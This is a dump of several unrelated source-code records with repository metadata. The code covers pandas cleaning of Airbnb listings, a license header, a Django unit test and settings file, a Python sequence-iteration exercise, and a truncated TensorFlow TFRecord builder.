          Listings with no available ('t') calendar rows get NaN prices and zero
          available-day counts.
    '''
    # Accumulate per-listing results in plain lists; np.append inside the
    # loop reallocated the whole array each iteration (quadratic).
    unavailable_days_list = []
    avail_weekends_list = []
    avail_weekdays_list = []
    price_weekend_list = []
    price_weekday_list = []

    for listing_id in df_listing.id:
        # All calendar rows for this listing.
        tmp = df_cal_modified[df_cal_modified.listing_id == listing_id]
        available_dict = tmp.available.value_counts().to_dict()

        if 'f' in available_dict:
            unavailable_days = tmp[tmp.available == 'f'].shape[0]
        else:
            unavailable_days = 0

        if 't' in available_dict:
            open_days = tmp[tmp.available == 't']
            available_weekends = open_days[open_days.weekend == True].shape[0]
            available_weekdays = open_days[open_days.weekend == False].shape[0]
            # mean() of an empty selection is NaN, matching the old
            # describe()['mean'] behaviour.
            price_weekend = open_days[open_days.weekend == True].price.astype(float).mean()
            price_weekday = open_days[open_days.weekend == False].price.astype(float).mean()
        else:
            available_weekends = 0
            available_weekdays = 0
            price_weekend = np.nan
            price_weekday = np.nan

        unavailable_days_list.append(unavailable_days)
        avail_weekends_list.append(available_weekends)
        avail_weekdays_list.append(available_weekdays)
        price_weekend_list.append(price_weekend)
        price_weekday_list.append(price_weekday)

    # dtype='float64' preserves the original behaviour, where the counts came
    # out of float numpy arrays. Positional alignment assumes df_listing has
    # a default RangeIndex, as before.
    df_listing['unavail_days'] = pd.Series(unavailable_days_list, dtype='float64')
    df_listing['avail_days_weekends'] = pd.Series(avail_weekends_list, dtype='float64')
    df_listing['avail_days_weekdays'] = pd.Series(avail_weekdays_list, dtype='float64')
    df_listing['price_weekend'] = pd.Series(price_weekend_list, dtype='float64')
    df_listing['price_weekday'] = pd.Series(price_weekday_list, dtype='float64')

    return df_listing
def clean_listing_df(df_listing):
    '''
    This function aims to make the df_listing dataframe ready for data analysis by
    - removing irrelevant columns
    - changing object type columns to numeric columns or manipulating them using one-hot encoding
    - filling NaN values
    - creating an integrated_score_log column: ln(review_scores_rating * number_of_reviews + 1)
    Input :
        - A Pandas dataframe made from 'listings.csv' : df_listing
    Output :
        - Cleaned df_listing

    Note: every Series.str.replace() call below passes an explicit `regex=` flag.
    The pandas default for `regex` changed across versions (True before 2.0,
    False from 2.0 on), so relying on the default silently changes behavior:
    '$' is an end-of-string anchor under regex=True (removes nothing) but a
    literal dollar sign under regex=False, while "[{}]" is a character class
    only under regex=True.
    '''
    # Drop columns having more than 50% NaN values. Reasons for the 50% threshold:
    # 1. Easy to see the dataframe and to check the meaning of the columns.
    # 2. Decide which ones have to be dropped.
    # The candidate columns to be dropped are 'notes', 'neighbourhood_group_cleansed',
    # 'square_feet', 'weekly_price', 'monthly_price', 'security_deposit',
    # 'has_availability', 'license', 'jurisdiction_names'. Most of them are duplicated
    # by other columns or irrelevant except 'security_deposit'. No imputing by the mean
    # or mode because that can distort the real shape; no one-hot-encoding to keep the
    # dataframe straightforward ('security_deposit' has 55 unique values).
    df_missing = df_listing.isna().mean()
    df_listing_modi1 = df_listing.drop(df_missing[df_missing > 0.5].index.to_list(), axis=1)

    # Drop columns related to urls and other irrelevant columns
    # (url and other columns are all unique or useless).
    remove_list1 = ['listing_url', 'scrape_id', 'last_scraped', 'thumbnail_url', 'medium_url', 'picture_url', 'xl_picture_url', 'host_url',
                    'host_thumbnail_url', 'host_picture_url', 'country_code', 'country']
    df_listing_modi1.drop(remove_list1, axis=1, inplace=True)

    # Drop the columns because of data overlap [city, smart_location],
    # only one value [state], and wrong data [market, calendar_last_scraped].
    remove_list2 = ['smart_location', 'state', 'name', 'summary', 'space', 'description', 'neighborhood_overview',
                    'transit', 'access', 'market', 'calendar_last_scraped']
    df_listing_modi1.drop(remove_list2, axis=1, inplace=True)

    # Modify 'house_rules' column to 'house_rules_exist_tf': True if there is a rule,
    # False otherwise. House rules differ per host, so one-hot encoding is not
    # practical; a binary flag keeps some information, which beats dropping.
    df_listing_modi1['house_rules_exist_tf'] = pd.notna(df_listing_modi1.house_rules)
    df_listing_modi1.drop(['house_rules'], axis=1, inplace=True)

    # Remove columns having ~1000 unique string values and irrelevant data.
    remove_list3 = ['interaction', 'host_name', 'host_since', 'host_about', 'street', 'first_review', 'experiences_offered',
                    'requires_license', 'last_review', 'host_location', 'neighbourhood_cleansed']
    df_listing_modi2 = df_listing_modi1.drop(remove_list3, axis=1)

    # Change percent/currency string columns ('100%', '$1,234.00') to float type.
    columns_change_type = ['host_response_rate', 'host_acceptance_rate', 'price', 'cleaning_fee']
    for col in columns_change_type:
        df_listing_modi2[col] = (df_listing_modi2[col]
                                 .str.replace('%', '', regex=False)
                                 .str.replace('$', '', regex=False)
                                 .str.replace(',', '', regex=False)
                                 .astype(float))

    # Modify and split values in the 'amenities' column.
    # Amenities can be one of the reasons a potential guest might consider.
    # "[{}]" is a character class: strips the surrounding braces in one pass.
    df_listing_modi2.amenities = df_listing_modi2.amenities.str.replace("[{}]", "", regex=True)
    df_amenities = df_listing_modi2.amenities.str.get_dummies(sep=",")
    df_amenities = df_amenities.add_prefix('amenities_')
    df_listing_modi2 = pd.concat([df_listing_modi2, df_amenities], axis=1)
    df_listing_modi2 = df_listing_modi2.drop('amenities', axis=1)

    # Use get_dummies for object columns having fewer than 10 unique values:
    # no information is lost and the dataframe stays simple.
    columns_of_object_less10 = []
    for i, j in zip(df_listing_modi2.columns.to_list(), df_listing_modi2.dtypes.to_list()):
        if j == object and len(df_listing_modi2[i].value_counts()) < 10:
            columns_of_object_less10.append(i)
    df_listing_modi2 = pd.get_dummies(df_listing_modi2, columns=columns_of_object_less10, prefix=columns_of_object_less10,
                                      dummy_na=True)

    # Modify 'extra_people' column to the boolean 'extra_people_fee_tf'.
    # Instead of dropping, keep a binary flag (fee > 0) to save some information.
    df_listing_modi2['extra_people'] = df_listing_modi2['extra_people'].astype(str)
    df_listing_modi2['extra_people'] = df_listing_modi2['extra_people'].str.replace('$', '', regex=False)
    df_listing_modi2['extra_people'] = df_listing_modi2['extra_people'].str.replace(',', '', regex=False)
    df_listing_modi2['extra_people'] = df_listing_modi2['extra_people'].astype(float)
    df_listing_modi2['extra_people'] = df_listing_modi2['extra_people'].replace(to_replace=0, value=np.nan)
    df_listing_modi2['extra_people_fee_tf'] = pd.notna(df_listing_modi2.extra_people)
    df_listing_modi2 = df_listing_modi2.drop('extra_people', axis=1)

    # Modify and split values in the 'host_verifications' column
    # (stored as a list-like string, e.g. "['email', 'phone']").
    df_listing_modi2.host_verifications = df_listing_modi2.host_verifications.str.replace("[", "", regex=False)
    df_listing_modi2.host_verifications = df_listing_modi2.host_verifications.str.replace("]", "", regex=False)
    df_host_verifications = df_listing_modi2.host_verifications.str.get_dummies(sep=",")
    df_host_verifications = df_host_verifications.add_prefix('host_verification_')
    df_listing_modi2 = pd.concat([df_listing_modi2, df_host_verifications], axis=1)
    df_listing_modi2 = df_listing_modi2.drop(['host_verifications'], axis=1)
    df_listing_modi2 = df_listing_modi2.drop(['host_neighbourhood'], axis=1)

    # Modify 'calendar_updated' column to a binary column
    # (updated within a week or not) to save some information.
    df_listing_modi2["calendar_updated_1weekago"] = np.where(df_listing_modi2['calendar_updated'].str.contains(
        "days|yesterday|today|a week ago") == True, 'yes', 'more_than_1week')
    df_listing_modi2 = df_listing_modi2.drop(['calendar_updated'], axis=1)

    # Use get_dummies for the remaining object columns with more than 10 unique
    # values ('neighbourhood', 'city', 'zipcode', 'property_type').
    columns_of_object_over10 = []
    for i, j in zip(df_listing_modi2.columns.to_list(), df_listing_modi2.dtypes.to_list()):
        if j == object and len(df_listing_modi2[i].value_counts()) > 10:
            columns_of_object_over10.append(i)
    df_listing_modi2 = pd.get_dummies(df_listing_modi2, columns=columns_of_object_over10,
                                      prefix=columns_of_object_over10, dummy_na=True)
    df_listing_modi2 = pd.get_dummies(df_listing_modi2, columns=['calendar_updated_1weekago', 'house_rules_exist_tf', 'extra_people_fee_tf'],
                                      prefix=['calendar_updated_1weekago', 'house_rules_exist_tf', 'extra_people_fee_tf'], dummy_na=True)

    # Flag hosts with a 100% response/acceptance rate, then drop the raw rates.
    df_listing_modi2["host_response_rate_100"] = np.where(df_listing_modi2['host_response_rate'] == 100, True, False)
    df_listing_modi2["host_acceptance_rate_100"] = np.where(df_listing_modi2['host_acceptance_rate'] == 100, True, False)
    df_listing_modi2 = df_listing_modi2.drop(['host_response_rate', 'host_acceptance_rate', 'reviews_per_month'], axis=1)

    # bathrooms, bedrooms, beds, cleaning_fee, review_scores_*: fillna with the mean
    # of each column. These are numeric, so mean imputation beats dropping or
    # one-hot encoding. Restrict mean() to the columns being filled so non-numeric
    # columns can never break the aggregation.
    columns1 = ['bathrooms', 'bedrooms', 'beds', 'cleaning_fee', 'review_scores_rating', 'review_scores_accuracy',
                'review_scores_cleanliness', 'review_scores_checkin', 'review_scores_communication',
                'review_scores_location', 'review_scores_value']
    df_listing_modi2[columns1] = df_listing_modi2[columns1].fillna(df_listing_modi2[columns1].mean())
    df_listing_modi2.price_weekend.fillna(df_listing_modi2.price, inplace=True)
    df_listing_modi2.price_weekday.fillna(df_listing_modi2.price, inplace=True)

    # Popularity score: ln(rating * number_of_reviews + 1); +1 keeps ln defined at 0.
    df_listing_modi2['integrated_score_log'] = np.log(df_listing_modi2['review_scores_rating'] * df_listing_modi2['number_of_reviews'] + 1)
    df_listing_modi2 = pd.get_dummies(df_listing_modi2, columns=['host_response_rate_100', 'host_acceptance_rate_100'],
                                      prefix=['host_response_rate_100', 'host_acceptance_rate_100'])
    df_listing_modi2 = df_listing_modi2.drop(['id', 'host_id', 'latitude', 'longitude', 'price', 'host_listings_count', 'host_total_listings_count', 'maximum_nights'], axis=1)
    return df_listing_modi2
def conditioning_listing_df(df_listing_modi2):
    '''
    Condition the dataframe returned by clean_listing_df(): label each listing
    ('poor' / 'normal' / 'high') from its integrated_score_log, then drop the
    columns that would leak the label into a model.

    Input :
        - A Pandas dataframe came from the function 'clean_listing_df(df_listing)'
    Output :
        - Cleaned df_listing_modi2 : df_listing_modi3
    '''
    # 'high' = top 20% of the integrated score; 'poor' = score of exactly 0;
    # everything else is 'normal'.
    top_quintile = df_listing_modi2.integrated_score_log.quantile(0.8)
    conditions = [df_listing_modi2['integrated_score_log'] == 0,
                  df_listing_modi2['integrated_score_log'] >= top_quintile]
    df_listing_modi2['y_label'] = np.select(conditions, ['poor', 'high'], default='normal')
    # Drop every column that is derived from (or directly drives) y_label,
    # so the remaining features cannot leak the target into a prediction.
    leak_columns = ['integrated_score_log', 'number_of_reviews', 'review_scores_rating',
                    'review_scores_value', 'review_scores_communication', 'review_scores_accuracy',
                    'review_scores_checkin', 'review_scores_cleanliness', 'review_scores_location',
                    'availability_30', 'availability_60', 'availability_90', 'availability_365',
                    'calculated_host_listings_count']
    return df_listing_modi2.drop(leak_columns, axis=1)
def investigate(df_listing_scaled, pca, i):
    '''
    Report which original features load most strongly (positively and
    negatively) on PCA component i.

    Input :
        - df_listing_scaled : a dataframe scaled by StandardScaler()
        - pca : fitted PCA instance
        - i : index of the PCA component to inspect
    Output :
        - pos_list : the 10 features with the largest positive weights,
          most important first
        - neg_list : the 10 features with the largest negative weights,
          most important first
    '''
    feature_names = list(df_listing_scaled.columns)
    # Deep-copy so sorting/zipping can never touch the fitted PCA state.
    component_weights = copy.deepcopy(pca.components_[i])
    ranked = sorted(zip(feature_names, component_weights),
                    key=lambda pair: pair[1], reverse=True)
    formatted = [(name, "{0:.3f}".format(weight)) for name, weight in ranked]
    print("positive to pca{}:".format(i), formatted[0:10])
    print()
    print("negative to pca{}:".format(i), formatted[-1:-11:-1])
    print()
    pos_list = [formatted[j][0] for j in range(0, 10)]
    neg_list = [formatted[-k][0] for k in range(1, 11)]
    return pos_list, neg_list
def check_difference(pos_list, neg_list, df_listing_poor, df_listing_high):
    '''
    Compare the mean of each listed feature between the 'high' and 'poor'
    groups and return a dataframe (index = feature names) sorted by the
    absolute difference, largest first.
    '''
    features = pos_list + neg_list
    rows = []
    for feature in features:
        rows.append([df_listing_high[feature].mean(), df_listing_poor[feature].mean()])
    summary = pd.DataFrame(data=rows, index=features, columns=['high', 'poor'])
    summary["difference"] = (summary.high - summary.poor).abs()
    return summary.sort_values(by=['difference'], ascending=False)
| 54.807453
| 501
| 0.716228
|
794b0f111f9a82f3baf57c7340021a301e1077e4
| 1,535
|
py
|
Python
|
servicex_storage/__init__.py
|
ssl-hep/servicex_storage_lib
|
43078bc9ce0dbad29cf152b0f2328f290a3d449f
|
[
"BSD-3-Clause"
] | null | null | null |
servicex_storage/__init__.py
|
ssl-hep/servicex_storage_lib
|
43078bc9ce0dbad29cf152b0f2328f290a3d449f
|
[
"BSD-3-Clause"
] | 15
|
2021-05-21T00:26:59.000Z
|
2022-03-19T16:10:27.000Z
|
tests/servicex_did_finder_lib/__init__.py
|
ssl-hep/ServiceX_DID_Finder_lib
|
15328b22a48f8bf30907c0240ce93f692ca85077
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2021, IRIS-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| 54.821429
| 80
| 0.785016
|
794b0f18e47168339b9d5b0032432d2436445874
| 382
|
py
|
Python
|
app/app/tests.py
|
OsamaDaghestani/recipe-app-api
|
f8963b1b899503d2802ddc6a5c91ada704b1352a
|
[
"MIT"
] | null | null | null |
app/app/tests.py
|
OsamaDaghestani/recipe-app-api
|
f8963b1b899503d2802ddc6a5c91ada704b1352a
|
[
"MIT"
] | null | null | null |
app/app/tests.py
|
OsamaDaghestani/recipe-app-api
|
f8963b1b899503d2802ddc6a5c91ada704b1352a
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from app.calc import add, subtract
class CalcTests(TestCase):
    """Unit tests for the add/subtract helpers imported from app.calc."""
    def test_add_numbers(self):
        """Test that two numbers are added together"""
        self.assertEqual(add(3, 8), 11)
    def test_subtract_numbers(self):
        """Test that numbers are subtracted"""
        # NOTE(review): expects subtract(5, 11) == 6, i.e. second argument
        # minus the first -- confirm app.calc defines that argument order.
        self.assertEqual(subtract(5, 11), 6)
| 23.875
| 54
| 0.659686
|
794b101e57ce4b3a37df2b17a4b1f5e5ad406109
| 11,801
|
py
|
Python
|
src/m5_more_sequences.py
|
mahne/12-MoreSequences
|
9a3a01897e12bae58fd86c421b387fc0204ac62e
|
[
"MIT"
] | null | null | null |
src/m5_more_sequences.py
|
mahne/12-MoreSequences
|
9a3a01897e12bae58fd86c421b387fc0204ac62e
|
[
"MIT"
] | null | null | null |
src/m5_more_sequences.py
|
mahne/12-MoreSequences
|
9a3a01897e12bae58fd86c421b387fc0204ac62e
|
[
"MIT"
] | null | null | null |
"""
This module lets you practice various patterns
for ITERATING through SEQUENCES, including:
-- Beginning to end
-- Other ranges (e.g., backwards and every-3rd-item)
-- The COUNT/SUM/etc pattern
-- The FIND pattern (via LINEAR SEARCH)
Authors: David Mutchler, Vibha Alangar, Matt Boutell, Dave Fisher,
Mark Hays, Amanda Stouder, Aaron Wilkin, their colleagues,
and Ethan Mahn.
""" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.
import rosegraphics as rg
def main():
    """ Runs every TEST function defined in this module, in order. """
    for test_function in (run_test_sum_radii,
                          run_test_count_last_n_odds,
                          run_test_index_of_first_negative,
                          run_test_contains_an_a):
        test_function()
###############################################################################
# Many problems simply iterate (loop) through ALL of the sequence,
# as in the sum_radii problem below.
###############################################################################
def run_test_sum_radii():
    """ Tests the sum_radii function. """
    print()
    print('--------------------------------------------------')
    print('Testing the sum_radii function:')
    print('--------------------------------------------------')

    # Each case pairs a sequence of rg.Circles with the expected radius sum.
    test_cases = [
        ((rg.Circle(rg.Point(100, 100), 25),
          rg.Circle(rg.Point(100, 100), 50),
          rg.Circle(rg.Point(100, 100), 10)),
         85),
        ((rg.Circle(rg.Point(200, 20), 80),
          rg.Circle(rg.Point(300, 100), 60),
          rg.Circle(rg.Point(100, 150), 0),
          rg.Circle(rg.Point(0, 0), 30)),
         170),
    ]
    for circles, expected in test_cases:
        print()
        print('Expected:', expected)
        print('Actual: ', sum_radii(circles))
def sum_radii(circles):
    """
    What comes in:
      -- a sequence of rg.Circle objects
    What goes out:
      Returns the sum of the radii of the given sequence of rg.Circles.
    Side effects: None.
    Example: If
        circle1 = rg.Circle(rg.Point(999, 100), 25)
        circle2 = rg.Circle(rg.Point(888, 200), 50)
        circle3 = rg.Circle(rg.Point(777, 300), 10)
    then sum_radii([circle1, circle2, circle3])
    returns 25 + 50 + 10, which is 85.
    Type hints:
      :type circles: list | tuple of rg.Circle
      :rtype: int | float
    """
    # Named 'total' (not 'sum') so the built-in sum() is not shadowed,
    # and iterate the circles directly instead of indexing by position.
    total = 0
    for circle in circles:
        total += circle.radius
    return total
###############################################################################
# Some problems iterate (loop) through PART of the sequence,
# perhaps BACKWARDS, as in the count_last_n_odds problem below.
###############################################################################
def run_test_count_last_n_odds():
    """ Tests the count_last_n_odds function. """
    print()
    print('--------------------------------------------------')
    print('Testing the count_last_n_odds function:')
    print('--------------------------------------------------')

    # Test set #1: count odds among the last 0, 1, 6, 7, 8 and 9 items.
    sequence = [1, 5, 88, 44, 33, 77, 10, 12, 9]
    results = [count_last_n_odds(sequence, n) for n in (0, 1, 6, 7, 8, 9)]
    print()
    print('Test set #1 of count_last_n_odds:', *results)
    print('The above should be: 0 1 3 3 4 5')

    # Test set #2: includes negative numbers and zero.
    sequence = [17, 88, -5, -10, 0]
    results = [count_last_n_odds(sequence, n) for n in (0, 1, 2, 3, 4, 5)]
    print()
    print('Test set #2 of count_last_n_odds:', *results)
    print('The above should be: 0 0 0 1 1 2')
def count_last_n_odds(integers, n):
    """
    What comes in:
      -- a sequence of integers
      -- a non-negative integer n that is no larger than the length
         of the given sequence
    What goes out: Returns how many of the last n items of the given
      sequence are odd.
    Side effects: None.
    Examples:
      If the sequence is (13, 66, 15, 3), then:
        count_last_n_odds(sequence, 0) is 0   [no odds]
        count_last_n_odds(sequence, 1) is 1   [just 3]
        count_last_n_odds(sequence, 2) is 2   [3 and 15]
        count_last_n_odds(sequence, 3) is 2   [3 and 15]
        count_last_n_odds(sequence, 4) is 3   [3, 15 and 13]
    Type hints:
      :type integers: list | tuple of int
      :type n: int
      :rtype: int
    """
    # Walk the last n positions left-to-right (the original walked them
    # right-to-left; the count is the same either way).
    odd_count = 0
    for position in range(len(integers) - n, len(integers)):
        if integers[position] % 2 == 1:
            odd_count += 1
    return odd_count
###############################################################################
# Some problems iterate (loop) through PART of the sequence,
# stopping when the loop FINDS something of interest
# (or continuing to the end if it does NOT find the thing of interest),
# as in the following problems:
###############################################################################
def run_test_index_of_first_negative():
    """ Tests the index_of_first_negative function. """
    print()
    print('--------------------------------------------------')
    print('Testing the index_of_first_negative function:')
    print('--------------------------------------------------')

    # Tests 1-3: sequences that DO contain a negative number.
    cases = [
        ([90, 0, 20, -5, 30, -10, 15], 3),
        ([-5, 30, -10, 15], 0),
        ([5, 30, 10, 15, -1], 4),
    ]
    for numbers, expected in cases:
        print()
        print('Expected:', expected)
        print('Actual: ', index_of_first_negative(numbers))

    # Test 4: no negative number present. Also warn if the STRING '-1'
    # was returned instead of the integer -1.
    print()
    expected = -1
    actual = index_of_first_negative([5, 30, 10, 15, 1, 6])
    print('Expected:', expected)
    print('Actual: ', actual)
    if actual == '-1':
        print(' Your answer is WRONG.')
        print(' You returned the STRING \'-1\'')
        print(' when you should have returned just -1')
def index_of_first_negative(numbers):
    """
    What comes in:
      -- a sequence of numbers
    What goes out: Returns the index of the first (smallest-index)
      negative number in the given sequence, or -1 if the sequence
      contains no negative numbers.
    Side effects: None.
    Examples: If the argument is:
      -- [4, 30, -19, 8, -3, -50, 100], this function returns 2
         (the first negative number, -19, is at index 2)
      -- [-8, 44, 33], this function returns 0
         (the first negative number, -8, is at index 0)
      -- [1, 29, 22, 8], this function returns -1
         (the list contains no negative numbers)
    Type hints:
      :type numbers: list | tuple of float | int
      :rtype: int
    """
    for index, number in enumerate(numbers):
        if number < 0:
            return index
    return -1
def run_test_contains_an_a():
    """ Tests the contains_an_a function. """
    print()
    print('--------------------------------------------------')
    print('Testing the contains_an_a function:')
    print('--------------------------------------------------')

    # (argument, expected result) pairs, checked in order.
    cases = (('nope', False),
             ('yes a is here', True),
             ('many aaaaas aaa aaa', True),
             ('not until the very end is a', True),
             ('a @ the beginning', True),
             ('', False),
             ('BLAH BLAH BLAH', False),
             ('BLAH BLAH BLAH \t MORE BLAH', False),
             ('BLAH BLAH BLAH \t MORE BLaH', True))
    for argument, expected in cases:
        actual = contains_an_a(argument)
        print()
        print('Expected:', expected)
        print('Actual: ', actual)
        # Catch the classic mistake of returning the STRING 'True'/'False'
        # instead of the built-in boolean constants.
        if type(actual) is str and str(expected) == actual:
            print('Your code FAILED this test for contains_an_a.')
            print(' You appear to have returned the STRING:')
            print(' "' + actual + '"')
            print(' instead of the built-in constant:')
            print(' ' + str(expected))
def contains_an_a(s):
    """
    What comes in:
      -- a string
    What goes out: Returns True if the given string contains the
      character 'a', and False otherwise.
    Side effects: None.
    Examples:
      -- contains_an_a('blah blah blah') returns True
      -- contains_an_a('BLAH BLAH BLAH') returns False
      -- contains_an_a('abc') returns True
      -- contains_an_a('') returns False
    Type hints:
      :type s: str
      :rtype: bool
    """
    # Explicit loop over the characters themselves (per the exercise,
    # no str.count / str.find shortcuts).
    for character in s:
        if character == 'a':
            return True
    return False
# -----------------------------------------------------------------------------
# Calls main to start the ball rolling -- but only when this file is run as a
# script, so importing the module (e.g. from a grader or test) has no
# side effects.
# -----------------------------------------------------------------------------
if __name__ == '__main__':
    main()
| 36.42284
| 79
| 0.518854
|
794b1090a86d5488b72caa60d61a191d9d338a87
| 5,516
|
py
|
Python
|
tests/settings14.py
|
0x07Ltd/django-condition-chain
|
b00d2efbdba6df1c0b3e167b961a9205664633b1
|
[
"Unlicense"
] | null | null | null |
tests/settings14.py
|
0x07Ltd/django-condition-chain
|
b00d2efbdba6df1c0b3e167b961a9205664633b1
|
[
"Unlicense"
] | null | null | null |
tests/settings14.py
|
0x07Ltd/django-condition-chain
|
b00d2efbdba6df1c0b3e167b961a9205664633b1
|
[
"Unlicense"
] | null | null | null |
# Django settings for Django Condition Chain project.
import os
from tempfile import gettempdir
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        # Keep the test database in the system temp dir so the repo stays clean.
        'NAME': os.path.join(gettempdir(), 'django-condition-chain.tests.db'),
        'USER': '', # Not used with sqlite3.
        'PASSWORD': '', # Not used with sqlite3.
        'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
        'PORT': '', # Set to empty string for default. Not used with sqlite3.
    }
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.4/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/London'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-gb'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
# NOTE(review): a hard-coded key is acceptable only because this is a
# test-settings module; production settings should load it from the
# environment instead of source control.
SECRET_KEY = '0yt52*upn&&_(jkkkd&-=r-x1b$2w(b2umv2_(+ak)gqzx#e($'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'django_condition_chain.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'django_condition_chain.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'django_condition_chain',
'django_nose'
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
| 33.840491
| 100
| 0.69797
|
794b11792dadf4144bdf1dce08fdd6c718226e24
| 3,255
|
py
|
Python
|
data_preprocess.py
|
LinMaris/JDD_PigImageClassification
|
2b84ba524265191ea7fc1ea5dc5ba32588e6b135
|
[
"MIT"
] | null | null | null |
data_preprocess.py
|
LinMaris/JDD_PigImageClassification
|
2b84ba524265191ea7fc1ea5dc5ba32588e6b135
|
[
"MIT"
] | null | null | null |
data_preprocess.py
|
LinMaris/JDD_PigImageClassification
|
2b84ba524265191ea7fc1ea5dc5ba32588e6b135
|
[
"MIT"
] | null | null | null |
import cv2
import numpy as np
import os
import tensorflow as tf
rootDir = './save/1/'
def makeData():
    """Convert the .jpeg images under ``rootDir`` into TFRecord files.

    Filenames are expected to look like ``"<class>_<index>.jpeg"`` with a
    1-based class id in [1, 30].  Each image is converted to 256x256 RGB and
    serialized together with its 30-way one-hot label.  Images whose index is
    divisible by 5 (roughly 1/5 of them) go to ``valid.tfrecords``, the rest
    to ``train.tfrecords``.
    """
    img_size = (256, 256)  # target (width, height) for cv2.resize
    num_classes = 30
    # Context managers guarantee both writers are flushed and closed even if
    # an image fails to decode part-way through the walk (the original code
    # leaked the writer handles on any exception).
    with tf.python_io.TFRecordWriter('train.tfrecords') as train_writer, \
         tf.python_io.TFRecordWriter('valid.tfrecords') as valid_writer:
        for parent, _dirnames, filenames in os.walk(rootDir):
            for filename in filenames:
                if not filename.endswith('.jpeg'):
                    continue
                image_path = os.path.join(parent, filename)
                img = cv2.imread(image_path)
                if img is None:
                    # Unreadable/corrupt file: skip it instead of crashing
